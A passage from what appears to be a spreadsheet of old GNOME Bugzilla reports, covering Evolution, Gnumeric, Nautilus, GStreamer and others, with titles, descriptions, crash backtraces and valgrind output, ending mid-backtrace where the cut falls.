the error it gives is as follows
cc1: unknown C standard `c99'
make[2]: *** [buffer.lo] Error 1
with buffer.lo being the first bit of code it attempts to compile
Am I correct in believing that gcc 3.x is currently required to build vte
properly or just missing something completely?
Apologies if this bug is incorrectly filed out as its the first I've
submitted. I couldn't see any open bugs that looked like this however.</t>
  </si>
  <si>
    <t>khalek</t>
  </si>
  <si>
    <t>EVOLUTION-202241</t>
  </si>
  <si>
    <t>Filter on 'Read' Status does not seem to work</t>
  </si>
  <si>
    <t>On the current snapshots (04.11.08.00 but I have never seen it work
previously either) I have tried to create a filter which moves read
messages to a folder called received (I am used to using pine which
prompts you when you exit if you want to move read messages to received).
This is on an IMAP store.
So I create a filter for messages where the Status is Read and the action
is Move to received. The filters.xml file looks like this:
      Received
            &lt;folder name=received
uri=imap://simonk@cartman/mail/received/&gt;
However when I go to my INBOX read a few messages then select all
messages and Apply Filters nothing happens.</t>
  </si>
  <si>
    <t>simon.king</t>
  </si>
  <si>
    <t>EVOLUTION-327304</t>
  </si>
  <si>
    <t>Next and Previous buttons in toolbar</t>
  </si>
  <si>
    <t>The Next and Previous buttons in toolbar for contacts and mail are different.
Other information:</t>
  </si>
  <si>
    <t>GSTREAMER-320923</t>
  </si>
  <si>
    <t>[volume] doesn't build on Solaris</t>
  </si>
  <si>
    <t>in gst-plugins-base 0.9.4 gst/volume/gstvolume.c won't build on Solaris with
the Forte compiler with the following error:
gstvolume.c line 396: syntax error before or at: 0
I suspect this problem is caused because the GST_ELEMENT_ERROR macro is 
improperly defined.  Attaching a patch that seems to correct this problem.</t>
  </si>
  <si>
    <t>HIG-73879</t>
  </si>
  <si>
    <t>Dialogs in screenshots need access keys</t>
  </si>
  <si>
    <t>The Preferences Window and Assistant screenshots have controls in them that
are lacking access keys.  Also the text field in the Properties Window
screenshot doesn't appear to have a text label at all which isn't good for
accessibility (although it's not clear to me just from looking at it that
it should really be editable at all-- can you really change the document's
filename here or is it some sort of 'friendly' name that just happens to
default to the document filename)?</t>
  </si>
  <si>
    <t>BEAGLE-362058</t>
  </si>
  <si>
    <t>Old Powerpoint File Takes 100% CPU Stops Indexing</t>
  </si>
  <si>
    <t>Please describe the problem:
Tenaciously snarfing up my home directory beagle discovered an old powerpoint document that it just can't handle. I will attach a copy of the file for verification. Unfortunately I can't honestly say what version of Powerpoint was used to create the file.
beagle-search still works while the indexer is going berserk.
Steps to reproduce:
1. Get a copy of the file I will attach
2. Run beagle-extract-content 
3. Get some eggs to fry on your CPU as it burns through millions of cycles in some sort of infinite loop.
Actual results:
The following output is produced. The program never terminates and utilizes all available CPU resources.
josh@cervantes:~$ beagle-extract-content .Trash/metview.ppt 
Filename: file:///home/josh/.Trash/metview.ppt
Debug: Loaded 46 filters from /usr/lib/beagle/Filters/Filters.dll
Filter: Beagle.Filters.FilterPPT
MimeType: application/vnd.ms-powerpoint
Properties:
  dc:title = No Slide Title
  fixme:last-saved-by = Melany Eslinger
  fixme:slide-count = 1
Expected results:
beagle would index any relevant data from the file and move on to the next task. The output would look something like this:
josh@cervantes:~$ beagle-extract-content metview2.ppt
Filename: file:///home/josh/.../metview2.ppt
Debug: Loaded 46 filters from /usr/lib/beagle/Filters/Filters.dll
Filter: Beagle.Filters.FilterPPT
MimeType: application/vnd.ms-powerpoint
Properties:
  dc:title = No Slide Title
  fixme:last-saved-by = The Author
  fixme:slide-count = 1
Content:
MetView 
(no hot content)
Does this happen every time?
Yes
Other information:
I will attach the file shortly</t>
  </si>
  <si>
    <t>qpt6qtty3typdc_b7wvc</t>
  </si>
  <si>
    <t>GNOME-VFS-46390</t>
  </si>
  <si>
    <t>Stopping Nautilus while navigating to an unreachable http server can block nautilus indefinitely</t>
  </si>
  <si>
    <t xml:space="preserve">1) Find a host that is not reachable.  That means DNS resolution is possible
but pinging the hostname never returns a response.  ipchains magic may make it
possible to construct this  case
2) Type in that host in the Nautilus URI bar
3) Hit Cancel
Expected:
	Navigation stops
Actual:
	Nautilus UI Freezes (probably for TCP timeout)
What's going on:
The Gnome-VFS HTTP method is blocking indefinitely on a connect().  It holds a
semaphore on the the GnomeVFS cancellation context.
The main thread of Nautilus calls gnome_vfs_async_cancel().  It blocks
indefinitely waiting for the semaphore.
Proposed fixes:
1) GnomeVFS connect() and read() abstractions could be set to non-blocking mode
and spin checking for cancellating event.  This does not handle the case where
gethostbyname() blocks
2) gnome_vfs_async_cancel could disconnect callback stuff but schedule the job
cleanup for later.  This seems more complicated but more complete.
------- Additional Comments From pavel@eazel.com 2001-02-06 18:09:02 ----
3) use signal to unblock the call. As Mike points out signal behaves quirky in
that it behaves non-portably on different implementations. If the set of
differences was manageable this would be a good solution though because you
would end up interrupting a call that othewise locks up resources faster.
------- Additional Comments From mikef@praxis.etla.net 2001-02-06 18:14:50 ----
Very similar to 6290
------- Additional Comments From mikef@praxis.etla.net 2001-02-06 18:16:04 ----
pavel--
Oh yeah I don't think a signal will bail out gethostbyname but then I don't
know if the job lock is called in the case where gethostbyname is called 
------- Additional Comments From sullivan@eazel.com 2001-02-07 09:49:55 ----
Seems necessary for 1.0.
------- Additional Comments From mikef@praxis.etla.net 2001-02-10 22:15:42 ----
*** Bug 46268 has been marked as a duplicate of this bug. ***
------- Additional Comments From yakk@yakk.net 2001-02-16 18:57:58 ----
*** Bug 46472 has been marked as a duplicate of this bug. ***
------- Additional Comments From don@eazel.com 2001-02-20 08:55:35 ----
Why isn't this a duplicate of bug #44573?
------- Additional Comments From darin@bentspoon.com 2001-02-20 11:57:40 ----
It's reasonable to guess that this might be a duplicate of bug 44573 but I don't
think there is clear evidence to prove that.
------- Additional Comments From mikef@praxis.etla.net 2001-02-20 13:38:58 ----
To pavel to add to his doom.
Due to the bad behaviour of gethostbyname (see bug 44573) it would be best if
this were fixed so that gnome_vfs_async_cancel doesn't block even though the
thread may hang around for a while.
Removing dependency on 4573
------- Additional Comments From mikef@praxis.etla.net 2001-02-20 13:40:11 ----
(to respond to darin and don's comments:  4573 is one of the things that can
*cause* this bug but it is not the only thing.  And fixing 4573 is not the only
or best way to fix this bug)
------- Additional Comments From don@eazel.com 2001-02-20 20:33:53 ----
Making gnome_vfs_async_cancel not block seems like a large task to be tackling
now.  Can this really be done in a day?
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 20:59 -------
Bug blocks bug(s) 41974 44019 46711.
The original owner (pavel@eazel.com) of this bug does not have an account here.
Reassigning to the default owner of the component yakk@yakk.net.
</t>
  </si>
  <si>
    <t>EVOLUTION-257837</t>
  </si>
  <si>
    <t>Widgets in Details tab active in Add contacts group dialog</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
In the Add Contacts Group dialog the controls (Search base Timeout etc.)
in the Details tab are active when the location for the contacts group is
On this computer
Expected Results:
The controls in the Details tab should only be active when the Type: is set
to On LDAP Servers
see also bug#257834
Additional Information:
Machine configuration
----------------------------------------------------------------------
SuSE Linux 9.0 (i586) i386 2.4.20-20.8
MozillaFirebird-0.6.1-47
mozilla-nspr-1.4.2-0.ximian.8.1
MozillaFirebird-0.6.1-47
mozilla-nss-1.4.2-0.ximian.8.1
XFree86-libs-4.3.0.1-21
alsa-0.9.6-66
atk-1.6.0-0.ximian.8.1
audiofile-0.2.3-326.ximian.8.2
esound-0.2.32-23.ximian.8.1
evolution-1.4.6-0.ximian.8.7
evolution-1.4.6-0.ximian.8.7
evolution1.5-1.5.7.0.200404290429-0.snap.ximian.8.1
expat-1.95.6-80
fontconfig-2.2.1-23.ximian.8.2
freetype2-2.1.5-65.ximian.8.1
ooo-1.1.0-0.ximian.8.1.1.47
gconf2-2.5.90-0.ximian.8.1
glib2-2.4.0-0.ximian.8.1
glibc-2.3.2-88
gnome-vfs2-2.6.0-0.ximian.8.1
gtk2-2.4.0-0.ximian.8.1
gtkhtml3.0-3.0.10-0.ximian.8.1
libart_lgpl-2.3.16-0.ximian.8.1
libbonobo-2.4.2-0.ximian.8.6
libbonoboui-2.5.3-0.ximian.8.1
libgal2.0_6-1.99.11-0.ximian.8.1
libglade2-2.3.2-0.ximian.8.4
libgnome-2.5.90-0.ximian.8.1
libgnomecanvas-2.5.90-0.ximian.8.1
libgnomeprint-2.3.0.cvs.9-0.ximian.8.5.1
libgnomeprintui-2.3.0-0.ximian.8.17
libgnomeui-2.2.2-44.ximian.8.4
libgtkhtml3.0_4-3.0.10-0.ximian.8.1
libjpeg-6.2.0-630
libsoup-1.99.28-0.ximian.8.1
libxml2-2.6.7-0.ximian.8.1
linc-1.0.3-68.ximian.8.2
mozilla-nspr-1.4.2-0.ximian.8.1
mozilla-nss-1.4.2-0.ximian.8.1
openssl-0.9.7b-71
orbit2-2.10.0-0.ximian.8.1
pango-1.4.0-0.ximian.8.1
popt-1.7-70
scrollkeeper-0.3.12-118.ximian.8.4
yelp-2.4.0-19.ximian.8.1
zlib-1.1.4-225</t>
  </si>
  <si>
    <t>GNOME-MEDIA-83678</t>
  </si>
  <si>
    <t>Not using G_IO_PRI</t>
  </si>
  <si>
    <t>cddb-slave.c (read_from_server):
should sed /G_IO_IN/(G_IO_IN | G_IO_PRI)/
since we might get 'priority' input on some OS'.</t>
  </si>
  <si>
    <t>GNUMERIC-351830</t>
  </si>
  <si>
    <t>error when saving and wipes current file</t>
  </si>
  <si>
    <t>Please describe the problem:
when saving in a gnumeric xls or openoffice format i get an error:
Error while saving file.
Unable to open module file /usr/lib/gnumeric/1.4.3/plugins/xml_sax/xml_sax.
/usr/lib/gnumeric/1.4.3/plugins/xml_sax/xml_sax.so: undefined symbol: gsf_xml_in_parse
and it will wipe the current file to 0 bytes in size all data lost
Steps to reproduce:
1. try to save in any format other than text or comma delimited
Actual results:
fails to save and wipes the current file to 0 bytes in size all data lost
Expected results:
the file saved correctly with no data loss
Does this happen every time?
yes on x86 and ppc runing gentoo
Other information:
on one file i was able to save important data by saving to comma delimited however a safer approach would leave the existing file intact.  (i lost most bank account information)</t>
  </si>
  <si>
    <t>mattmatteh</t>
  </si>
  <si>
    <t>GNUMERIC-67994</t>
  </si>
  <si>
    <t>seg fault</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.54
Synopsis: seg fault
Class:    sw-bug
Distribution: Red Hat Linux release 7.0 (Guinness)
System: Linux 2.2.16-22 i686 unknown
C library: glibc-2.1.92-14
C compiler: 2.96
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.9
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.1
Description:
I opened an .xls spreadsheet. I made some changes and then saved it in
the default format for Gnumeric. I then copied and pasted from one cell
to another and it caused a seg fault.
Debugging information:
(no debugging symbols found)...0x405ae5a9 in __wait4 () from /lib/libc.so.6
#0  0x405ae5a9 in __wait4 () from /lib/libc.so.6
#1  0x40618824 in __DTOR_END__ () from /lib/libc.so.6
#2  0x40165b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  __textdomain (domainname=0x844de98 )
    at textdomain.c:98
#5  0x80c471e in workbook_view_history_shrink ()
#6  0x80c501f in gnumeric_xml_write_workbook ()
#7  0x807aa99 in workbook_save ()
#8  0x402b28b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#9  0x402e4c0a in gtk_handlers_run () from /usr/lib/libgtk-1.2.so.0
#10 0x402e3f4d in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#11 0x402e1cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#12 0x4024a9fd in gtk_button_clicked () from /usr/lib/libgtk-1.2.so.0
#13 0x4024c25d in gtk_real_button_released () from /usr/lib/libgtk-1.2.so.0
#14 0x402b28b3 in gtk_marshal_NONE__NONE () from /usr/lib/libgtk-1.2.so.0
#15 0x402e3dd8 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#16 0x402e1cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#17 0x4024a92d in gtk_button_released () from /usr/lib/libgtk-1.2.so.0
#18 0x4024bb47 in gtk_button_button_release () from /usr/lib/libgtk-1.2.so.0
#19 0x402b257e in gtk_marshal_BOOL__POINTER () from /usr/lib/libgtk-1.2.so.0
#20 0x402e3f8c in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#21 0x402e1cf5 in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#22 0x4031bc39 in gtk_widget_event () from /usr/lib/libgtk-1.2.so.0
#23 0x402b24f5 in gtk_propagate_event () from /usr/lib/libgtk-1.2.so.0
#24 0x402b15bf in gtk_main_do_event () from /usr/lib/libgtk-1.2.so.0
#25 0x40366c21 in gdk_event_dispatch () from /usr/lib/libgdk-1.2.so.0
#26 0x404e1987 in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#27 0x404e2001 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#28 0x404e21cc in g_main_run () from /usr/lib/libglib-1.2.so.0
#29 0x402b0e57 in gtk_main () from /usr/lib/libgtk-1.2.so.0
#30 0x80623d4 in _start ()
#31 0x8062435 in main ()
#32 0x40514b65 in __libc_start_main (main=0x8062420  argc=1 
    ubp_av=0xbffff9e4 init=0x805f3a0  fini=0x811cafc  
    rtld_fini=0x4000df24  stack_end=0xbffff9dc)
    at ../sysdeps/generic/libc-start.c:111
#0  0x405ae5a9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x40618824 in __DTOR_END__ () from /lib/libc.so.6
No symbol table info available.
#2  0x40165b38 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  
No locals.
#4  __textdomain (domainname=0x844de98 )
    at textdomain.c:98
domainname = 0x844de98 
new_domain = 0x0
old_domain = 0x8291008 C
new_domain = 0x0
old_domain = 0x8291008 C
#5  0x80c471e in workbook_view_history_shrink ()
No symbol table info available.
#6  0x80c501f in gnumeric_xml_write_workbook ()
No symbol table info available.
#7  0x807aa99 in workbook_save ()
No symbol table info available.
------- Bug moved to this database by unknown@bugzilla.gnome.org 2002-01-04 03:48 -------
The original reporter (kokoszka@pineau.local) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jody@gnome.org.
</t>
  </si>
  <si>
    <t>kokoszka</t>
  </si>
  <si>
    <t>RHYTHMBOX-132368</t>
  </si>
  <si>
    <t>Support for mms:// streams / URLs</t>
  </si>
  <si>
    <t>If rhythmbox is compiled against xine-lib would it be possible to add asx
files as internet radio streams? being that many sites use streaming asx
files (Sirius Satellite Radio's internet streams are a good example) it'd
be a worthwhile addition. 
I've been able to successfully play the streams in Totem (hi Mr. Nocera)
but would like to use one application do perform all audio functions. 
is this an unlikely addition?</t>
  </si>
  <si>
    <t>mushroomblue</t>
  </si>
  <si>
    <t>GNOME-APPLETS-159903</t>
  </si>
  <si>
    <t>Locations Love - Austria (2): Provinces not only cities</t>
  </si>
  <si>
    <t xml:space="preserve">I file this seperate from the other Locations Love bug because I am
not sure if this is a bug or a feature  )
Up to now I only saw cities (or other defined places like airports)
in gwether. Now there are some *Provinces* (strangely enough not all
9 of them just two). This concerns the locations
OberÃ¶sterreich and
NiederÃ¶sterreich
Both of them are larger areas (BundeslÃ¤nder) and have a widely 
varying weather on their different parts see eg. for weather in
OberÃ¶sterreich (Upper Austria):
http://wetter.orf.at/ooe/
I'll attach a patch against my other patch though likely it's 
easier to simply nuke these locations by hand.
Don't hesitate to contact me if you've got further questions!
Ralph Aichinger </t>
  </si>
  <si>
    <t>GTK+-158010</t>
  </si>
  <si>
    <t>statusbar resize grip hidden initially</t>
  </si>
  <si>
    <t>When you pack other widgets pack-end the resize grip is hidden until you first
resize the window.
Testcase attached.</t>
  </si>
  <si>
    <t>GNUMERIC-491131</t>
  </si>
  <si>
    <t>Uninitialized value used during Excel chart import</t>
  </si>
  <si>
    <t>Version: r16029
OS: Ubuntu Gutsy
Steps to reproduce:
- Run Gnumeric in valgrind
- Import gnumeric/samples/excel/chart-tests-excel.xls
Valgrind output:
==6824== Conditional jump or move depends on uninitialised value(s)
==6824==    at 0x45C7038: go_line_interpolation_as_str (go-line.c:270)
==6824==    by 0x78487BD: xl_chart_read_end (ms-chart.c:2738)
==6824==    by 0x784A054: ms_excel_chart_read (ms-chart.c:3250)
==6824==    by 0x784ABCE: ms_excel_chart_read_BOF (ms-chart.c:3454)
==6824==    by 0x783F907: ms_read_OBJ (ms-obj.c:1268)
==6824==    by 0x78106BF: ms_escher_read_ClientData (ms-escher.c:1985)
==6824==    by 0x7810C73: ms_escher_read_container (ms-escher.c:2089)
==6824==    by 0x780E844: ms_escher_read_SpContainer (ms-escher.c:500)
==6824==    by 0x7810C73: ms_escher_read_container (ms-escher.c:2089)
==6824==    by 0x78102F2: ms_escher_read_SpgrContainer (ms-escher.c:1926)
==6824==    by 0x7810C73: ms_escher_read_container (ms-escher.c:2089)
==6824==    by 0x781031C: ms_escher_read_DgContainer (ms-escher.c:1931)
(gnumeric:6824): GLib-GObject-CRITICAL **: g_object_set: assertion `G_IS_OBJECT (object)' failed
(gnumeric:6824): GLib-GObject-WARNING **: invalid unclassed pointer in cast to `GogDataset'
** (gnumeric:6824): WARNING **: gog_dataset_set_dim called with invalid GogDataset
(gnumeric:6824): GLib-GObject-CRITICAL **: g_object_set: assertion `G_IS_OBJECT (object)' failed
(gnumeric:6824): GLib-GObject-WARNING **: invalid unclassed pointer in cast to `GogDataset'
** (gnumeric:6824): WARNING **: gog_dataset_set_dim called with invalid GogDataset</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-346909</t>
  </si>
  <si>
    <t>missing window icon</t>
  </si>
  <si>
    <t>AisleRiot does not set up a window icon</t>
  </si>
  <si>
    <t>EVOLUTION-238009</t>
  </si>
  <si>
    <t>Crash when clicking on calendar shortcut button</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 1.2.0
Synopsis: Crash when clicking on calendar shortcut button
Bugzilla-Product: Evolution
Bugzilla-Component: Calendar
Description:
Description of Problem:
I had a mailbox window open. I clicked on the calendar shortcut to
switch to my calendar and the evolution calendar component crashed.
Steps to reproduce the problem:
1. Run evolution for an hour
2. Click on the calnedar shortcut button
3. 
Actual Results:
component crashed
Expected Results:
see calendar
How often does this happen?
first time
Additional Information:
Debugging Information:
Backtrace was generated from '/usr/bin/evolution-calendar'
(no debugging symbols found)...[New Thread 8192 (LWP 12092)]
0x420ae169 in wait4 () from /lib/i686/libc.so.6
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4047dc63 in waitpid () from /lib/i686/libpthread.so.0
#3  0x40c358bd in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#4  0x4047f47e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
#5  
#6  0x080bda49 in e_week_view_reshape_event_span ()
#7  0x080bd967 in e_week_view_reshape_events ()
#8  0x080bd604 in e_week_view_check_layout ()
#9  0x080b93cc in e_week_view_size_allocate ()
#10 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
#11 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#12 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#13 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#14 0x40ed9a03 in gtk_notebook_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#15 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
#16 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#17 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#18 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#19 0x40593136 in e_hpaned_size_allocate () from /usr/lib/libgal.so.21
#20 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
#21 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#22 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#23 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#24 0x40f3cde7 in gtk_vbox_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#25 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
#26 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#27 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#28 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#29 0x40f55617 in gtk_window_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#30 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
#31 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#32 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#33 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
#34 0x40f56f55 in gtk_window_move_resize () from
/usr/lib/libgtk-1.2.so.0
#35 0x40ecc4d6 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
#36 0x40f08000 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
#37 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
#38 0x40e7ac0e in gtk_container_check_resize () from
/usr/lib/libgtk-1.2.so.0
#39 0x40e7a83c in gtk_container_idle_sizer () from
/usr/lib/libgtk-1.2.so.0
#40 0x40fcbadf in g_idle_dispatch () from /usr/lib/libglib-1.2.so.0
#41 0x40fca97e in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
#42 0x40fcae59 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
#43 0x40fcb0f4 in g_main_run () from /usr/lib/libglib-1.2.so.0
#44 0x40eca6df in gtk_main () from /usr/lib/libgtk-1.2.so.0
#45 0x403b2a2e in bonobo_main () from /usr/lib/libbonobo.so.2
#46 0x080ce9e1 in main ()
#47 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
Thread 1 (Thread 8192 (LWP 12092)):
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
No symbol table info available.
#1  0x4212a2d0 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x4047dc63 in waitpid () from /lib/i686/libpthread.so.0
No symbol table info available.
#3  0x40c358bd in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#4  0x4047f47e in __pthread_sighandler () from
/lib/i686/libpthread.so.0
No symbol table info available.
#5  
No symbol table info available.
#6  0x080bda49 in e_week_view_reshape_event_span ()
No symbol table info available.
#7  0x080bd967 in e_week_view_reshape_events ()
No symbol table info available.
#8  0x080bd604 in e_week_view_check_layout ()
No symbol table info available.
#9  0x080b93cc in e_week_view_size_allocate ()
No symbol table info available.
#10 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#11 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#12 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#13 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#14 0x40ed9a03 in gtk_notebook_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#15 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#16 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#17 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#18 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#19 0x40593136 in e_hpaned_size_allocate () from /usr/lib/libgal.so.21
No symbol table info available.
#20 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#21 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#22 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#23 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#24 0x40f3cde7 in gtk_vbox_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#25 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#26 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#27 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#28 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#29 0x40f55617 in gtk_window_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#30 0x40ecc330 in gtk_marshal_NONE__POINTER () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#31 0x40f07ece in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#32 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#33 0x40f49fbf in gtk_widget_size_allocate () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#34 0x40f56f55 in gtk_window_move_resize () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#35 0x40ecc4d6 in gtk_marshal_NONE__NONE () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#36 0x40f08000 in gtk_signal_real_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#37 0x40f054ae in gtk_signal_emit () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#38 0x40e7ac0e in gtk_container_check_resize () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#39 0x40e7a83c in gtk_container_idle_sizer () from
/usr/lib/libgtk-1.2.so.0
No symbol table info available.
#40 0x40fcbadf in g_idle_dispatch () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#41 0x40fca97e in g_main_dispatch () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#42 0x40fcae59 in g_main_iterate () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#43 0x40fcb0f4 in g_main_run () from /usr/lib/libglib-1.2.so.0
No symbol table info available.
#44 0x40eca6df in gtk_main () from /usr/lib/libgtk-1.2.so.0
No symbol table info available.
#45 0x403b2a2e in bonobo_main () from /usr/lib/libbonobo.so.2
No symbol table info available.
#46 0x080ce9e1 in main ()
No symbol table info available.
#47 0x420158d4 in __libc_start_main () from /lib/i686/libc.so.6
No symbol table info available.
#0  0x420ae169 in wait4 () from /lib/i686/libc.so.6
Setting qa contact to the default for this product.
   This bug either had no qa contact or an invalid one.
</t>
  </si>
  <si>
    <t>NAUTILUS-62498</t>
  </si>
  <si>
    <t>wrong time value for date modified</t>
  </si>
  <si>
    <t>Nautilus shwos the wrong time for files modified between =0:00 and 01:00.
Instead of i.e. 0:05 it shows 12:05</t>
  </si>
  <si>
    <t>EVOLUTION-203765</t>
  </si>
  <si>
    <t>Crashes in my absense</t>
  </si>
  <si>
    <t xml:space="preserve">Package: Evolution
Priority: Normal
Version: 0.10.99
Synopsis: Crashes in my absense
Bugzilla-Product: Evolution
Bugzilla-Component: Mailer
Description:
dunno - just leave your machine unattended ??
Unknown reporter: udippel@apiit.edu.my changed to bugbuddy-import@ximian.com.
Reassigning to the default owner of the component evolution-mail-maintainers@ximian.com.
</t>
  </si>
  <si>
    <t>udippel</t>
  </si>
  <si>
    <t>PLANNER-151483</t>
  </si>
  <si>
    <t>exported HTML dates messed up</t>
  </si>
  <si>
    <t>I have a plan starting in week 202004 ending in week 452005. A task starts at
the beginning of week 292004. firefox displays the start date at the end of
week 27. I have another task starting at the same time. This one is shown as
starting in mid week 27 by firefox.
How do I append sample files in bugzilla?</t>
  </si>
  <si>
    <t>Andrej.Vodopivec</t>
  </si>
  <si>
    <t>GNOME-CORE-63646</t>
  </si>
  <si>
    <t>crash of desktop envinronment on firsti install</t>
  </si>
  <si>
    <t xml:space="preserve">Package: bug-buddy
Severity: normal
Version: 1.4.0.4
Synopsis: crash of desktop envinronment on firsti install
Bugzilla-Product: bug-buddy
Bugzilla-Component: general
Description:
crash of desktop environment on first instal
Debugging Information:
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
(no debugging symbols found)...(no debugging symbols found)...
0x405af669 in __wait4 () from /lib/i686/libc.so.6
#0  0x405af669 in __wait4 () from /lib/i686/libc.so.6
#1  0x4062b154 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x4015be88 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  
#4  0x40575221 in chunk_alloc (ar_ptr=0x40629620 nb=56) at malloc.c:2878
#5  0x40576b47 in __libc_calloc (n=52 elem_size=1) at malloc.c:3844
#6  0x404e391b in g_malloc0 () from /usr/lib/libglib-1.2.so.0
#7  0x404b7f82 in gdk_pixmap_new () from /usr/lib/libgdk-1.2.so.0
#8  0x0808dea6 in panel_widget_draw_all () at eval.c:41
